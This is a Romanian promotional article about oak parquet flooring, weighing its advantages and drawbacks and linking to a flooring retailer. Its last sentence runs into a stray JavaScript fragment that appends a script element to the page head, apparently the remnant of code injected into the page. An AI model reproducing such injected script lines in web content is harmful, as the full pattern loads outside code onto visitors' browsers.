parchet stejar

Stejarul este foarte cautat in domeniul parchetului, iar modele de parchet stejar sunt multiple, insa este bine de stiut cand alegeti oricare dintre aceste modele de parchet stejar ca acestea vor avea o serie de avantaje, insa pot avea si o serie de aspecte care sa fie poate mai putin convenabile pentru dumneavoastra.

In acest sens, este bine sa analizati cu atentie ofertele de parchet stejar inainte de a va hotari asupra modelului pe care doriti sa il achizitionati.

Avantaje parchet stejar

parchet stejarCand vorbim de parchet stejar, un prim avantaj de luat in considerare este faptul ca acesta este usor de intretinut si de curatat. Mizeria si praful nu se vor lipi de un parchet stejar la fel de usor cum o vor face pe alte tipuri de parchet.

In plus, ca si aspect, putem spune ca la parchet stejar, culoarea se va mentine timp indelungat, nu va pali odata cu trecerea timpului si astfel aspectul de nou se va mentine mai multa vreme fara prea mari eforturi.

Un alt aspect important la alegerea de parchet stejar, unul la care poate doar persoanele in cauza se vor gandi, este faptul ca acesta este o alegere ideala pentru persoanele cu alergii. Un parchet stejar nu va mentine praful si alte elemente care pot agrava anumite alergii, astfel fiind foarte solicitat de persoane care sufera de astfel de afectiuni.

Modelele de parchet stejar sunt foarte diferite, deci gama de alegeri este una vasta, astfel incat nu veti ramane “blocati” cu aceeasi culoare de podea comuna, intrucat un parchet stejar este foarte diferit de la un model la altul.

Nu este de uitat nici faptul ca acest parchet stejar este si foarte rezistent, astfel ca veti putea aseza pe el orice mobila doriti, fara sa va faceti griji ca va crapa. Totodata, un parchet stejar poate fi refinisat si slefuit de mai multe ori, deci aspectul sau poate fi constant imbunatatit.

Alte aspecte de luat in calcul in achizitionarea de parchet stejar

In achizitionarea de parchet stejar trebuie sa luati in considerare si faptul ca acesta va trebui dat cu ceara la un moment dat, intrucat este din lemn.

Totodata, uneori poate fi usor alunecos, astfel ca trebuie sa fiti atenti atunci cand pasiti pe el, mai ales fara papuci.parchet-stejar2 La parchet stejar trebuie sa va ganditi si la faptul ca acesta va fi ceva mai sensibil la umezeala, deci atunci cand il curatati cu mopul spre exemplu, asigurati-va ca acesta este doar umed si nu ud complet. Uneori, daca pasiti pe un parchet stejar de la www.decolandia.ro cu anumiti pantofi, acesta va fi usor “zgomotos” insa daca nu va deranjeaza acest lucru, il puteti privi ca si un aspect in plus al calitatii sale superioare.

In ansamblu, un parchet stejar va avea cu siguranta mai multe avantaje decat dezavantaje, astfel ca tot ce va ramane de facut este sa alegeti modelul de parchet stejar potrivit pentru dumneavoastra si sa va bucurati de el.d.getElementsByTagName(‘head’)[0].appendChild(s);